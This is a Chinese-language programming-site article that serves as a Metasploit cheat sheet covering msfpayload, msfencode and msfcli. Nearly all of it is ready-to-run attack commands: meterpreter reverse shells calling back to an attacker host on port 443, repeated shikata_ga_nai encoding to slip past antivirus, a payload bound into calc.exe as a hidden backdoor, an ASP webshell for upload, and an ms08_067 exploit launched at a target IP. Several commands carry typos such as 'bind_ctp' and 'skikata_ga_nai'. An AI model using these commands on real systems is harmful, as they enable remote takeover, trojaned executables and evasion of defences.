欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

MSF常用的监听模块命令

程序员文章站 2022-06-23 09:26:19
msfpayload 命令   帮助msfpayload -h   列出所有可用的攻击载荷  msfpayload windows/meterpreter...

msfpayload 命令

 

帮助msfpayload -h

 

列出所有可用的攻击载荷  msfpayload windows/meterpreter/bind_tcp O

 

列出所有windows/meterpreter/bind_tcp 下攻击载荷的配置项(任何攻击载荷都是可以配置的)msfpayload windows/meterpreter/bind_tcp O.

 

创建一个meterperter的reverse_tcp攻击载荷,回连到your ip的端口,将其保存为名为payload.exe的windows可执行程序msfpayload windows/meterpreter/reverse_tcp LHOST=your ip LPORT=port X > payload.exe

 

与上生成同样的攻击载荷,导出成原始格式文件,该文件将后面的MSFencode中使用msfpayload windows/meterpreter/reverse_tcp LHOST=your ip LPORT=port R > payload.raw

 

与上面生成同样的攻击载荷,但导出成C格式的shellcodemsfpayload windows/meterpreter/bind_tcp LPORT=port C > payload.c

 

导出成以%U编码方式的javascript语言字符串msfpayload windows/meterpreter/bind_tcp LPORT=port J > payload.java

 

产生webshell将此webshell上传到服务器,这个步骤要有上传权限msfpayload windows/meterpreter/reverse_tcp LHOST=your_ip | msfencode -t asp -o webshell.asp

 

启动msfconsole 输入:use exploits/multi/handlerset PAYLOAD windows/meterpreter/reverse_tcpset LHOST your_ipexploit

 

msfencode 命令

 

帮助msfencode -h

 

列出所有可用的编码器msfencode -l

 

显示编码缓冲区的格式msfencode -t (c,elf,java,js_Le,js_be,perl,raw,ruby,vba,vbs,loop-vbs,asp,war,macho)

 

使用shikata_ga_nai编码器对payload.raw文件进行5次编码,然后导出一个名为encoded_payload.exe的文件msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe

 

创建一个经过多种编码格式的嵌套编码的攻击载荷msfpayload windows/meterpreter/bind_tcp LPORT=port R | msfencode -e x86/_countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe

 

创建一个纯字母数字的shellcode,由ESI寄存器指向shellcode,以C语言格式输出msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c

 

msfcli命令

 

仅列出渗透攻击模块msfcli|grep exploit

 

仅列出与windows相关的渗透攻击模块msfcli|grep exploit/windows

 

对对方IP发起ms08_067_natapi渗透攻击,配置bind_tcp攻击载荷,并绑定在443端口进行监听msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_ctp LPORT=443 RHOST=对方IP E

 

metasploit高级忍术

 

创建一个反弹式的meterpreter攻击载荷,回连到192.168.1.1主机的443端口,使用calc.exe作为载苛后门程序,让载荷执行流一直运行在被攻击的应用程序中,最后生成以.shikata_ga_nai编码器编码后的攻击载荷可执行程序payload.exemsfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=443 R | msfencode -x calc.exe -k -o payload.exe -e x86/skikata_ga_nai -c 7 -t exe

 

创建一个反弹式的meterpreter攻击载荷,回连到192.168.1.1主机的443端口,使用calc.exe作为载苛后门程序,不让载荷执行流一直运行在被攻击的应用程序中,同时在攻击载荷执行后也不会在目标主机上弹出任何信息,这种配置非常有用,当你通过浏览器漏洞控制了远程主机,并不想让计算器程序打开呈现在目标用户面前。同样,最后生成用.shikata_ga_nai编码器的攻击载荷可执行程序payload.exemsfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=443 R | msfencode -x calc.exe -o payload.exe -e x86/skikata_ga_nai -c 7 -t exe

 

创建一个raw格式的bind_tcp模式meterpreter攻击载荷,用.shikata_ga_nai编码7次,输出以payload.exe命名的windows可执行程序文件,同时启用多路监听方式进行执行msfpayload windows/meterpreter/bind_tcp LHOST=192.168.1.1 LPORT=443 R | msfencode -o payload.exe -e x86/shikata_ga_nai -c 7 -t exe && msfcli multi/handler PAYLOAD=windows/meterpreter/bind_tcp LPORT=443 E